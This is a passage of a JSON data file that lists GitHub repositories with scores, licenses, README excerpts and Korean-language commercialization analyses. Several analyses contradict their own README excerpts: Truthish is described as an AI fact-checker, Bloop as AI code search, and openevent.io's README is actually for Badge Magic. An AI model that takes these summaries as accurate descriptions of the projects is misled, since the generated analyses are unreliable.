JavaScript](https://img.shields.io/lgtm/grade/javascript/g/MrRio/jsPDF.svg?lo","composite_score":0.2134,"license_safety_tag":"safe"},{"name":"dromara/sureness","github_url":"https://github.com/dromara/sureness","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":10,"description":"# Sureness 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에 접근하는 사람들을 안전하게 확인하고 관리하는 기술로, 보안이 중요한 모든 온라인 서비스의 필수 요소입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회원관리 시스템이 필요한 클라우드 업무 도구(협업, 회계, HR 솔루션 등)에 통합\n- **내부 업무 도구**: 직원들의 신분을","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/usthe/sureness\">\n    <img alt=\"sureness\" src=\"./docs/_media/brand128.svg\">\n  </a>\n</p>\n\n# <font size=\"14p\">Dromara Sureness</font> <font size=\"5p\">  | [中文文档](README_CN.md)</font>\n\n> A efficient security framework that focus on the protection of REST API.\n\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![Maven](https://img.shields.io/badge/Maven%20Central-1.0.5-blue.svg)](https://search.maven.org/artifact/com.usthe.sureness/sureness-core)\n![GitHub pull request check contexts](https://img.shields.io/github/status/contexts/pulls/dromara/sureness/8?label=pull%20checks)\n[![Gitter](https://img.shields.io/gitter/room/usthe/sureness?label=sureness&color=orange&logo=gitter&logoColor=red)](https://gitter.im/usthe/sureness)\n![GitHub Release Date](https://img.shields.io/github/release-date/dromara/sureness?color=blue&logo=figshare&logoColor=red)\n[![star](https://gitee.com/d","composite_score":0.2134,"license_safety_tag":"safe"},{"name":"anza-xyz/solana-sdk","github_url":"https://github.com/anza-xyz/solana-sdk","stars":238,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2132,"license_safety_tag":"safe"},{"name":"hyperium/hyper-util","github_url":"https://github.com/hyperium/hyper-util","stars":176,"language":"Rust","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2132,"license_safety_tag":"safe"},{"name":"billy21/Tvlist-awesome-m3u-m3u8","github_url":"https://github.com/billy21/Tvlist-awesome-m3u-m3u8","stars":6,"language":"","license":"unknown","abandonment_months":6,"description":"# billy21/Tvlist-awesome-m3u-m3u8 분석 보고서\n\n## 왜 보물인가\nTV 채널 목록을 한 곳에서 관리하고 공유할 수 있는 기능으로, 스트리밍 서비스 사용자들이 여러 플랫폼을 통합해서 볼 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **스트리밍 플랫폼 SaaS**: 사용자가 구독한 여러 TV 채널을 하나의 앱에서 통합 관리하는","readme_excerpt":"<p align=\"center\"><img src=\"img/IPTV.jpg\" alt=\"iptv\" width=\"auto\" height=\"150\"><img src=\"img/M3U.jpg\" alt=\"iptv\" width=\"auto\" height=\"150\"></p>\n\n# 直播源相关资源汇总\n\n现在各个宽带运营商都有 IPTV 业务，不用安装有线电视就可以高清无卡顿的看电视。\n\n没有开通 iptv 可以使用抓取的直播源地址，复制到电脑、手机、电视网络盒子等设备上看，如果动手能力强也可以自己抓包获取直播源。\n\n由于版权原因很多电视直播软件播放时会卡顿、画面不清晰。\n\n## 目录\n\n- [URL](#稳定地址)\n- [工具](#工具)\n- [插件](#插件)\n- [视频教程](#视频教程)\n- [文章](#文章)\n- [赞助者](#赞助商)\n\n\n### 更新\n  - 20251114\n    - 全国可用直播源\n    - 各地运营商IPTV直播源\n\n<details>\n<summary>更早期更新</summary>\n<p>\n  - 20230227\n    - 国内电视台 2023-02\n    - 国外电视台 2023-02\n    - 台湾香港澳门 2023-02\n  - 20221205\n    - 国内电视台 2022-11\n    - 国外电视台 2022-11\n    - 台湾香港澳门 2022-11\n  - 20221109\n    - 国内电视台 2022-7\n    - 国外电视台 2022-7\n    - 台湾香港澳门 2022-7\n  - 20220111\n    - GGTV 424个源全部可用\n    - 影视剧场 45个全部流畅\n    - 4k直播源 1300个全部有效【全部4k老电脑别用】🌟\n    - 3100个全部有效\n    - 直播源 5000个全部有效\n    - 国家直播源 160多个全部有效\n  - 20200523\n    - 更新 国内电视台直播源\n    - 更新 台湾香港海外直播源\n    - 更新 轮播爱奇艺CIBN华数NewTV虎牙战旗\n  - 20200305\n    - 新增800个广播电台\n    - 新增9个CCTV付费频道直播源\n    - 新增腾讯云CCTV+卫视\n    - ","composite_score":0.213,"license_safety_tag":"unknown"},{"name":"Microsoft/react-native-code-push","github_url":"https://github.com/Microsoft/react-native-code-push","stars":7,"language":"C","license":"NOASSERTION","abandonment_months":12,"description":"# Microsoft/react-native-code-push 분석\n\n## 왜 보물인가\n스마트폰 앱을 다운로드 없이 즉시 업데이트할 수 있게 해주는 Microsoft의 공식 도구로, 앱 개발자들의 필수 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 업데이트 서비스**: 게임사나 금융앱 개발사가 긴급 버그 수정을 앱스토어를 거치지 않고 즉시 배포","readme_excerpt":"# Archiving this repository\n\nVisual Studio App Center was retired on March 31, 2025, except for its Analytics and Diagnostics features. You can learn more about the retirement and the Analytics and Diagnostics extension [here](https://aka.ms/appcenter/retire). CodePush, along with other App Center features, was also retired on March 31, 2025. Consequently, we are archiving this repository.\n\n---\n\n[![appcenterbanner](https://user-images.githubusercontent.com/31293287/32969262-3cc5d48a-cb99-11e7-91bf-fa57c67a371c.png)](http://microsoft.github.io/code-push/)\n\n#### [Sign up With App Center](https://appcenter.ms/signup?utm_source=CodePush&utm_medium=Azure) to use CodePush\n\n## React Native Module for CodePush\n> [!WARNING]\n> React Native CodePush won't support new Architecture. In order to use this plugin on React Native versions starting from 0.76 you will need to [opt out](https://reactnative.dev/blog/2024/10/23/the-new-architecture-is-here#opt-out) from new architecture.\n>\n*Note: This READM","composite_score":0.2129,"license_safety_tag":"unknown"},{"name":"meitu/lmstfy","github_url":"https://github.com/meitu/lmstfy","stars":6,"language":"Go","license":"MIT","abandonment_months":1,"description":"# meitu/lmstfy 상용화 분석\n\n## 왜 보물인가\n작업 대기열을 자동으로 관리해주는 시스템으로, 대량의 요청을 안정적으로 처리해야 하는 모든 온라인 서비스의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **이미지 처리 SaaS**: 사진 편집 요청 수천 개를 받았을 때 순차적으로 처리하는 미용 앱 백엔드 시스템\n2. **배송 관리 내부 도","readme_excerpt":"<img src=\"doc/images/logo.png\" alt=\"lmstfy_logo\" width=\"200\" height=\"200\"/>\n\n# LMSTFY(Let Me Schedule Task For You) \n[![Build Status](https://github.com/bitleak/lmstfy/workflows/Lmstfy%20Actions/badge.svg)](https://github.com/bitleak/lmstfy/actions)  [![Go Report Card](https://goreportcard.com/badge/github.com/bitleak/lmstfy)](https://goreportcard.com/report/github.com/bitleak/lmstfy) [![codecov](https://codecov.io/gh/bitleak/lmstfy/branch/master/graph/badge.svg?token=1O559OI069)](https://codecov.io/gh/bitleak/lmstfy) [![GitHub release](https://img.shields.io/github/tag/bitleak/lmstfy.svg?label=release)](https://github.com/bitleak/lmstfy/releases) [![GitHub release date](https://img.shields.io/github/release-date/bitleak/lmstfy.svg)](https://github.com/bitleak/lmstfy/releases) [![LICENSE](https://img.shields.io/github/license/bitleak/lmstfy.svg)](https://github.com/bitleak/lmstfy/blob/master/LICENSE) [![GoDoc](https://img.shields.io/badge/Godoc-reference-blue.svg)](https://godoc.org/gi","composite_score":0.2129,"license_safety_tag":"safe"},{"name":"cowprotocol/services","github_url":"https://github.com/cowprotocol/services","stars":299,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2127,"license_safety_tag":"safe"},{"name":"kevglass/gute","github_url":"https://github.com/kevglass/gute","stars":8,"language":"TypeScript","license":"unknown","abandonment_months":11,"description":"# Gute 저장소 분석\n\n## 왜 보물인가\n정보가 부족하여 이 저장소의 핵심 기능과 가치를 파악하기 어렵습니다.\n8개의 Star 수준으로는 아직 충분한 검증이 이루어지지 않은 초기 프로젝트로 보입니다.\n저장소 설명과 README 문서 확인이 필수적입니다.\n\n## 어디에 쓸 수 있나\n**내부 업무 도구**: 팀이 공유하는 작은 규모의 작업 관리나 자동화 도","readme_excerpt":"![logo](https://kevglass.github.io/gute/test/logo.png)\n\n# gute\n\nGute is a simple web games library. It gives you a game loop, input, sounds, music and tilesets. I'll probably add some bitmap font support. \n\nLinked to Discord\n\n# Installation\n\n```npm install gute```\n\nor if you're using pure JS just grab https://github.com/kevglass/gute/blob/master/dist/index.js and include it. See the example below.\n\n# Example\n\nhttps://kevglass.github.io/gute/test/\n\nPure JS Source code: https://kevglass.github.io/gute/test/game.js\n\nTS/Webpack Example: https://github.com/kevglass/gute-test\n\n# Guide\n\nhttps://github.com/kevglass/gute/wiki\n\n# Docs\n\nhttps://kevglass.github.io/gute/\n\n# Next Up\n\n* [LDTk](https://ldtk.io/) Map Loading\n* A-Star Pathfinder \n* Bitmap Font support if I can find a common standard\n\n\n","composite_score":0.2126,"license_safety_tag":"unknown"},{"name":"tencentyun/TIMSDK","github_url":"https://github.com/tencentyun/TIMSDK","stars":5,"language":"Objective-C","license":"unknown","abandonment_months":1,"description":"# TIMSDK 저장소 분석\n\n## 왜 보물인가\n텐센트가 만든 메시징 플랫폼의 핵심 도구로, 채팅·영상통화 같은 실시간 통신 기능을 앱에 쉽게 추가할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 팀 협업 플랫폼(Slack 같은)에서 메시지·음성통화 기능 제공\n2. **내부 업무 도구**: 회사 직원들이 쓰는 메신저 앱에 실","readme_excerpt":"English | [简体中文](./README_ZH.md)\n\n# Tencent Cloud Chat SDK (IM SDK)\n\nTencent Chat SDK provides a powerful **Chat API**, **messaging SDK**, and **UIKit** components to help developers build full-featured real-time messaging — including **one-to-one chat**, **channel chat**, **message push**, **offline push notifications**, and **send message** functionality — across **Android, iOS, MAC, Windows, Web, Flutter, React Native**, and more.\n\n## About\n\nTencent Chat SDK powers billions of messages daily across Tencent's ecosystem. Drop in our pre-built **UIKit** to ship a full-featured chat experience in under 10 minutes, or use the **Core SDK** to build your own UI on top of a battle-tested messaging infrastructure — available across every major platform.\n\n<img src=\"https://qcloudimg.tencent-cloud.cn/raw/9c893f1a9c6368c82d44586907d5293d.png\" style=\"zoom:50%;\"/>\n\n## Core Capabilities\n\n- **UIKit** — Build a fully-featured chat app in just ten minutes using UIKit components\n- **Various Message Ty","composite_score":0.2124,"license_safety_tag":"unknown"},{"name":"apache/arrow-rs-object-store","github_url":"https://github.com/apache/arrow-rs-object-store","stars":261,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2124,"license_safety_tag":"safe"},{"name":"doctrine/persistence","github_url":"https://github.com/doctrine/persistence","stars":7,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Doctrine Persistence 상용화 분석\n\n## 왜 보물인가\n데이터베이스와 프로그램을 연결하는 기본적인 기술을 제공하여, 웹서비스나 앱 개발 회사들이 복잡한 데이터 관리 작업을 쉽게 처리할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (예: 회사 정보관리 플랫폼)**\n- 수백 개 기업의 직원 정보, 급여, 근무 기록","readme_excerpt":"# Doctrine Persistence\n\n[![GitHub Actions][GA 4.2 image]][GA 4.2]\n[![Code Coverage][Coverage 4.2 image]][CodeCov 4.2]\n\nThe Doctrine Persistence project is a library that provides common abstractions for object mapper persistence.\n\n## More resources:\n\n* [Website](https://www.doctrine-project.org/)\n* [Documentation](https://www.doctrine-project.org/projects/doctrine-persistence/en/latest/index.html)\n* [Downloads](https://github.com/doctrine/persistence/releases)\n\n  [Coverage 4.2 image]: https://codecov.io/gh/doctrine/persistence/branch/4.2.x/graph/badge.svg\n  [CodeCov 4.2]: https://codecov.io/gh/doctrine/persistence/branch/4.2.x\n  [GA 4.2 image]: https://github.com/doctrine/persistence/actions/workflows/continuous-integration.yml/badge.svg?branch=4.2.x\n  [GA 4.2]: https://github.com/doctrine/persistence/actions/workflows/continuous-integration.yml?branch=4.2.x\n","composite_score":0.2122,"license_safety_tag":"safe"},{"name":"tizonia/tizonia-openmax-il","github_url":"https://github.com/tizonia/tizonia-openmax-il","stars":5,"language":"C","license":"lgpl-3.0","abandonment_months":11,"description":"# Tizonia OpenMAX IL 분석 보고서\n\n## 왜 보물인가\n음악 재생과 오디오 처리를 하드웨어 칩셋 수준에서 직접 제어할 수 있는 기술로, 스마트 스피커나 IoT 음향기기의 성능과 배터리 효율을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **IoT 음향기기 SaaS 플랫폼**: 스마트 스피커 제조업체에게 고급 오디오 처리 엔","readme_excerpt":"<a href=\"https://tizonia.org/\">\n    <img src=\"https://avatars2.githubusercontent.com/u/3161606?s=400&v=4\" alt=\"Tizonia logo\" title=\"The Tizonia Project\" align=\"right\" height=\"100\" />\n</a>\n\n# The Tizonia Project\n\n* A command-line streaming music client/server for Linux.\n* Support for Spotify (Premium), Google Play Music (free and paid tiers),\n  YouTube, SoundCloud, TuneIn and iHeart Internet Radio directories, Plex\n  servers and Chromecast devices.\n* The first open-source implementation of [OpenMAX IL\n  1.2](https://www.khronos.org/news/press/khronos-group-releases-openmax-il-1.2-provisional-specification).\n\n---\n\n<div align=\"center\">\n  <a href=\"https://travis-ci.org/tizonia/tizonia-openmax-il\">\n    <img src=\"https://travis-ci.org/tizonia/tizonia-openmax-il.png\" />\n  </a>\n\n  <a href=\"https://scan.coverity.com/projects/594\">\n    <img src=\"https://scan.coverity.com/projects/594/badge.svg\" />\n  </a>\n\n  <a href=\"https://codecov.io/gh/tizonia/tizonia-openmax-il\">\n    <img src=\"https://img.shi","composite_score":0.2121,"license_safety_tag":"restricted"},{"name":"heppoko/Unity_uGUI_Advance_Reference","github_url":"https://github.com/heppoko/Unity_uGUI_Advance_Reference","stars":126,"language":"","license":"Unlicense","abandonment_months":10,"description":"# heppoko/Unity_uGUI_Advance_Reference 분석\n\n## 왜 보물인가\n게임 개발자들이 어려워하는 화면 UI 디자인 문제를 해결하는 실전 예제 모음으로, 직접 복사해서 바로 사용할 수 있는 완성된 코드들입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 온라인 강의 SaaS**: 게임 제작 입문자들을 위해 UI 튜토리얼 콘텐츠로","readme_excerpt":"# Unity uGUI アドバンスド・リファレンス\n\n## ダウンロード方法\n\n[Unity_uGUI_Advanced_Reference.pdf](https://github.com/heppoko/Unity_uGUI_Advance_Reference/blob/main/Unity_uGUI_Advanced_Reference.pdf) の Download ボタンを押す（ファイルサイズが大きいので GitHub のプレビューではうまく表示できないかもしれない）\n\n## 対象読者\n\n本書は Unity の uGUI の基本原理を深く理解したいと願う読者のために書かれている。もし、すぐに効果が出る Tips や便利な UI アセットの紹介を期待しているのであれば、残念ながら期待外れになるかもしれない。だが、こんな経験はないだろうか？\n\n- 便利な UI アセットが特定のプラットフォームに対応していない\n\n- Unity のバージョンを上げたら便利な UI アセットが動かなくなった\n\n- 何もしていないのに便利な UI アセットが動かなくなった\n\n本書の内容を理解することで、そのような状況に遭遇した場合でも落ち着いて対応ができるようになるだろう。\n\nまた、本書の内容はパフォーマンス改善のためにも非常に役に立つはずである。たとえば、uGUI でのパフォーマンス最適化の手法としては\n\n- Canvas を分割する\n\n- 無駄な RaycastTarget を減らす\n\n- Camera.main の利用を避ける\n\n- Auto Layout の Layout Group をなるべく使わないようにする\n\n- Animation や Timeline で UI をアニメーションさせない\n\nなどが一般的に知られている。本書を通読した暁には、それらの手法がなぜ有効なのかの理由を理解することができるようになるだろう。\n\n本書では uGUI のコンポーネントのプロパティや public メソッドの解説を記述してある。これらの解説は公式リファレンスのコピーではなく、著者がソースコードを確認した上で実際に呼び出して挙動の検証を経た結果である。さらに、顕著な *GC Alloc* が発生する場合には注釈を入れている。これにより、公式リファレンスでは得られない詳細な挙動を知ること","composite_score":0.212,"license_safety_tag":"unknown"},{"name":"huxingyi/dust3d","github_url":"https://github.com/huxingyi/dust3d","stars":111,"language":"C++","license":"MIT","abandonment_months":0,"description":"# huxingyi/dust3d 분석 보고서\n\n## 왜 보물인가\n3D 모델링을 누구나 쉽게 할 수 있도록 만든 무료 오픈소스 도구로, 복잡한 전문 소프트웨어 없이도 입체 디자인 작업이 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **3D 모델링 SaaS 플랫폼**: 게임 회사나 애니메이션 제작사를 위한 웹 기반 모델링 도구 구독 서비스\n2. **내부 업무 ","readme_excerpt":"# Dust3D\n\nDust3D is a cross-platform 3D modeling software that makes it easy to create low poly 3D models for video games, 3D printing, and more.\n\n## Getting Started\n\nThese instructions will get you a copy of the Dust3D up and running on your local machine for development and testing purposes.\n\n### Prerequisites\n\nIn order to build and run Dust3D, you will need the following software and tools:\n\n- Qt\n- Visual Studio 2019 (Windows only)\n- GCC (Linux only)\n\n#### Windows\n\n1. Download and install the `Qt Online Installer`\n2. Run the installer and choose the Qt archives you want to install (required: qtbase, qtsvg)\n3. Install Visual Studio 2019\n\n#### Linux\n\n1. Install Qt using your distribution's package manager (e.g. `apt-get install qt5-default libqt5svg5-dev` on Ubuntu)\n\n### Building\n\nA step by step series of examples that tell you how to get a development environment running\n\n1. Clone the repository\n```\ngit clone https://github.com/huxingyi/dust3d.git\n```\n\n2. Build using qmake\n\n#### Wind","composite_score":0.2117,"license_safety_tag":"safe"},{"name":"brightmart/nlp_chinese_corpus","github_url":"https://github.com/brightmart/nlp_chinese_corpus","stars":6,"language":"","license":"MIT","abandonment_months":4,"description":"# brightmart/nlp_chinese_corpus 분석 보고서\n\n## 왜 보물인가\n중국어 텍스트를 이해하고 처리하는 인공지능을 만들 때 필요한 학습 자료 모음으로, 중국어 AI 서비스 개발의 핵심 기반 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 중국어 채팅 서비스(SaaS)**\n- 중국어 고객 지원 챗봇이나 AI 어시스턴트를 제공하는 구독형 ","readme_excerpt":"\n#### 为中文自然语言处理领域发展贡献语料\n\nSuperCLUE官网更新（2026-02-06）： <a href='https://www.superclueai.com/' target=\"__blank\">www.SuperClueAI.com</a>\n\n中文大模型基准测评2025年年度报告(New!)：<a href='https://www.cluebenchmarks.com/superclue_2025' target=\"__blank\">中文大模型基准测评2025年年度报告</a>\n\nState Of Chinese AI 2025(New!)：<a href='https://www.cluebenchmarks.com/superclue_2025_en' target=\"__blank\">State Of Chinese AI 2025</a>\n\n\n*** update ****\n\n中文任务基准测评，10大任务 & 9个模型一键运行、详细测评：\n\nLanguage Understanding Evaluation benchmark for Chinese(<a href='https://www.CLUEbenchmarks.com'>CLUE benchmark<a/>): run 10 tasks & 9 baselines with one line of code, performance comparision with details.\n    \nReleasing Pre-trained Model of <a href=\"https://github.com/brightmart/albert_zh\">ALBERT_Chinese</a>:\n\nTraining with 30G+ Raw Chinese Corpus, xxlarge, small version and more, Target to match State of the Art performance in Chinese with 30% less parameters, 2019-Oct-7, During the National Day of China!</a>\n\n语料库将会不断扩充。。。\n\n一期目标：10个百万级中文语料 & 3个千万级中文","composite_score":0.2116,"license_safety_tag":"safe"},{"name":"fossasia/openevent.io","github_url":"https://github.com/fossasia/openevent.io","stars":10,"language":"Dart","license":"Apache-2.0","abandonment_months":0,"description":"# fossasia/openevent.io 분석 보고서\n\n## 왜 보물인가\n세계 어디서나 누구나 쉽게 행사(콘퍼런스, 축제, 모임)를 만들고 관리할 수 있는 무료 플랫폼으로, 복잡한 행사 운영 업무를 자동화해줍니다.\n\n## 어디에 쓸 수 있나\n1. **행사 관리 SaaS**: 학교·기업·지역사회가 월 구독으로 이용하는 온라인 행사 플랫폼\n2. **대행사 내","readme_excerpt":"<img height=\"200px\" src=\"./docs/images/app_icon.png\" align=\"right\" />\n\n# Badge Magic\n[![Join the chat at https://gitter.im/fossasia/badge-magic](https://badges.gitter.im/fossasia/badge-magic.svg)](https://gitter.im/fossasia/badge-magic?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n![Github](https://img.shields.io/github/license/fossasia/badgemagic-app?logo=github)\n\n**Python Library to program via desktop https://github.com/fossasia/led-name-badge-ls32**\n\n**Magically Create Text and Draw Cliparts on LED Name Badges using Bluetooth**\n\nThe Badge Magic app is a comprehensive LED badge management system that lets you create, customize, save, and transfer dynamic text and graphics to LED name badges via Bluetooth. The app features an intuitive interface with multiple creation modes, extensive animation options, and powerful customization tools.\n\n## Key Features\n\n### 🎨 **Multi-Mode Creation**\n- **Text Mode**: Create animated text with 22 different transition effec","composite_score":0.2112,"license_safety_tag":"safe"},{"name":"varabyte/truthish","github_url":"https://github.com/varabyte/truthish","stars":11,"language":"Kotlin","license":"Apache-2.0","abandonment_months":5,"description":"# Truthish 저장소 분석\n\n## 왜 보물인가\nAI가 생성한 답변이 정말 맞는지 자동으로 검증해주는 도구로, 잘못된 정보를 퍼뜨리는 AI의 가장 큰 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 챗봇 SaaS**: 고객에게 AI 챗봇이 제공한 답변이 정확한지 실시간으로 확인하고 신뢰도를 표시\n2. **기업 내부 의사결정 도구**: ","readme_excerpt":"## Truthish\n\n![version](https://img.shields.io/badge/version-1.0.4-blue.svg)\n![truthish tests](https://github.com/varabyte/truthish/actions/workflows/gradle-test-all.yml/badge.svg)\n![coverage badge](https://img.shields.io/endpoint?url=https://gist.githubusercontent.com/bitspittle/01b6bfe88483946d9f5438f5616d9b9f/raw/truthish-coverage-badge.json)\n<br>\n![kotlin version](https://img.shields.io/badge/kotlin_compatibility-1.6+-lightgray?logo=kotlin)\n![targets](https://img.shields.io/badge/targets-JVM,_JS,_Win,_Linux,_Mac,_Android,_iOS,_Wasm-white.svg)\n<br>\n<a href=\"https://discord.gg/bCdxPr7aTV\">\n  <img alt=\"Varabyte Discord\" src=\"https://img.shields.io/discord/886036660767305799.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2\" />\n</a>\n[![Bluesky](https://img.shields.io/badge/Bluesky-0285FF?logo=bluesky&logoColor=fff)](https://bsky.app/profile/bitspittle.bsky.social)\n\nA testing API inspired by [Google Truth](https://github.com/google/truth) but\nrewritten in Kotlin fr","composite_score":0.2111,"license_safety_tag":"safe"},{"name":"solana-program/token-2022","github_url":"https://github.com/solana-program/token-2022","stars":188,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2111,"license_safety_tag":"safe"},{"name":"anomanetwork/anoma","github_url":"https://github.com/anomanetwork/anoma","stars":10,"language":"Elixir","license":"MIT","abandonment_months":2,"description":"# Anoma 저장소 분석\n\n## 왜 보물인가\n복잡한 수학 계산이 필요한 블록체인 기술을 더 정확하고 안전하게 만들어주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 사용자들의 자산을 정확하게 추적하고 계산하는 백엔드 시스템으로 제공\n2. **금융기관 내부 도구**: 은행이나 투자사에서 블록체인 기반 결제 시스템을 안","readme_excerpt":"# Anoma\n\nThis is an implementation of the Anoma protocol, whose specs can be\nfound [here](https://specs.anoma.net/latest).\n\n## Docs\n\n- [Contributors documentation](https://anoma.github.io/anoma/readme.html)\n- [Specification](https://specs.anoma.net/latest/)\n- Developer Docs (Coming Soon™)\n- User Docs (Coming Soon™)\n\n## Following Development\n\nWork is merged into `base` on a bi-weekly (once every two weeks)\nschedule.\n\nDevelopment can be followed in multiple ways:\n\n1. [Issues are put into the project overview](https://github.com/orgs/anoma/projects/19)\n   - This is a good way to see what work is assigned and the various\n     views into how goals are being met\n2. [What's Cooking on Anoma](https://github.com/orgs/anoma/projects/20 \"A good view on how topics are progressing throughout a cycle\")\n3. [Research Forums](https://research.anoma.net/)\n   - This is good for seeing discussions on the direction of Anoma\n   - [The architecture posts](https://research.anoma.net/tags/c/protocol-design/25/","composite_score":0.2109,"license_safety_tag":"safe"},{"name":"reactiveops/rbac-manager","github_url":"https://github.com/reactiveops/rbac-manager","stars":9,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# RBAC Manager 상용화 분석\n\n## 왜 보물인가\n회사 내 직원들의 권한을 안전하게 관리하는 핵심 도구로, 보안 사고를 예방하면서 업무 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 멀티테넌트 클라우드 플랫폼에서 각 고객사의 사용자 권한을 자동으로 관리하는 기능\n2. **내부 업무 도구**: 대기업의 인사, ","readme_excerpt":"<div align=\"center\" class=\"no-border\">\n    <img src=\"/img/rbac-manager-logo.svg\" height=\"200\" alt=\"RBAC Manager\" style=\"padding-bottom: 20px\">\n    <br>\n    <a href=\"https://join.slack.com/t/fairwindscommunity/shared_invite/zt-e3c6vj4l-3lIH6dvKqzWII5fSSFDi1g\">\n      <img src=\"https://img.shields.io/static/v1?label=Slack&message=Join+our+Community&color=4a154b&logo=slack\">\n    </a>\n    <a href=\"https://github.com/FairwindsOps/rbac-manager/releases\">\n        <img src=\"https://img.shields.io/github/v/release/FairwindsOps/rbac-manager\">\n    </a>\n    <a href=\"https://goreportcard.com/report/github.com/FairwindsOps/rbac-manager\">\n        <img src=\"https://goreportcard.com/badge/github.com/FairwindsOps/rbac-manager\">\n    </a>\n    <a href=\"https://insights.fairwinds.com/gh/FairwindsOps/rbac-manager\">\n      <img src=\"https://insights.fairwinds.com/v0/gh/FairwindsOps/polaris/badge.svg\">\n    </a>\n</div>\n\nRBAC Manager is designed to simplify authorization in Kubernetes. This is an operator that sup","composite_score":0.2108,"license_safety_tag":"safe"},{"name":"scalacenter/bloop","github_url":"https://github.com/scalacenter/bloop","stars":38,"language":"Scala","license":"Apache-2.0","abandonment_months":0,"description":"# Bloop 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 코드를 빠르게 검색하고 분석할 수 있는 AI 기반 개발 도구로, 소프트웨어 개발 회사들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 클라우드 서비스**: 기업 개발팀이 웹에서 바로 접속해 코드 검색·분석하는 협업 플랫폼으로 제공\n2. **내부 업무 도구**:","readme_excerpt":"<div align=\"center\">\n\n<img src=\"website/static/img/impure-logo-bloop.png\" alt=\"logo\" width=\"20%\" height=\"20%\">\n\n# Compile, test and run Scala fast\n\n<img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/scalacenter/bloop/total.svg?color=orange&style=flat-square\">\n<img alt=\"GitHub CI\" src=\"https://github.com/scalacenter/bloop/workflows/Continuous%20Integration/badge.svg?style=flat-square\" />\n<img alt=\"GitHub release\" src=\"https://img.shields.io/github/release/scalacenter/bloop.svg?color=green&logo=github\">\n<img alt=\"GitHub\" src=\"https://img.shields.io/github/license/scalacenter/bloop.svg?color=blue&style=flat-square\" />\n\n<div align=\"left\">\n<br>\n  \nBloop is a build server for the [Scala programming\nlanguage](https://scala-lang.org). Bloop aspires to provide the **best**\nout-of-the-box experience to Scala developers and a solid platform for build\ntool authors to consume the Scala toolchain; to compile, test or run Scala code.\n\nBloop integrates with editors, build tool","composite_score":0.2106,"license_safety_tag":"safe"},{"name":"comit-network/xmr-btc-swap","github_url":"https://github.com/comit-network/xmr-btc-swap","stars":7,"language":"Rust","license":"GPL-3.0","abandonment_months":10,"description":"# XMR-BTC-SWAP 프로젝트 분석\n\n## 왜 보물인가\n모네로(XMR)와 비트코인(BTC) 같은 서로 다른 암호화폐를 안전하게 교환할 수 있는 기술로, 중앙 거래소 없이도 직접 거래할 수 있게 해주는 혁신적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **분산형 암호화폐 거래 플랫폼**: 사용자들이 중앙 거래소를 거치지 않고 직접 암호화폐를 교환할","readme_excerpt":"> [!CAUTION]\n> # THIS REPO IS UNMAINTAINED <br>PLEASE USE [eigenwallet]([url](https://github.com/eigenwallet/core)) INSTEAD\n\n**This repository is unmaintained**. The original developers (@comit-network) have moved on to other projects. Community volunteers are continuing development at [eigenwallet/core](https://github.com/eigenwallet/core), which includes a graphical user interface. Please note that the fork has introduced network-level breaking changes, making it incompatible with peers running this repository - you will not be able to initiate swaps with them.\n\n# XMR to BTC Atomic Swap\n\nThis repository hosts an MVP for atomically swapping BTC to XMR.\nIt implements the protocol described in section 3 of [this](https://arxiv.org/abs/2101.12332) paper.\n\nMore information about the protocol in this [presentation](https://youtu.be/Jj8rd4WOEy0) and this [blog post](https://comit.network/blog/2020/10/06/monero-bitcoin).\n\nCurrently, swaps are only offered in one direction with the `swap` CLI","composite_score":0.2105,"license_safety_tag":"restricted"},{"name":"Shopify/bootsnap","github_url":"https://github.com/Shopify/bootsnap","stars":10,"language":"Ruby","license":"MIT","abandonment_months":0,"description":"# Shopify/bootsnap 평가 분석\n\n## 왜 보물인가\n웹사이트나 앱의 로딩 속도를 획기적으로 빠르게 만들어주는 핵심 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 대규모 데이터를 다루는 웹 애플리케이션의 초기 로딩 시간을 50% 이상 단축하여 사용성 향상\n- **내부 업무 도구**: 직원","readme_excerpt":"# Bootsnap [![Actions Status](https://github.com/rails/bootsnap/workflows/ci/badge.svg)](https://github.com/rails/bootsnap/actions)\n\nBootsnap is a library that plugs into Ruby, with optional support for `YAML` and `JSON`,\nto optimize and cache expensive computations. See [How Does This Work](#how-does-this-work).\n\n#### Performance\n\n- [Discourse](https://github.com/discourse/discourse) reports a boot time reduction of approximately\n  50%, from roughly 6 to 3 seconds on 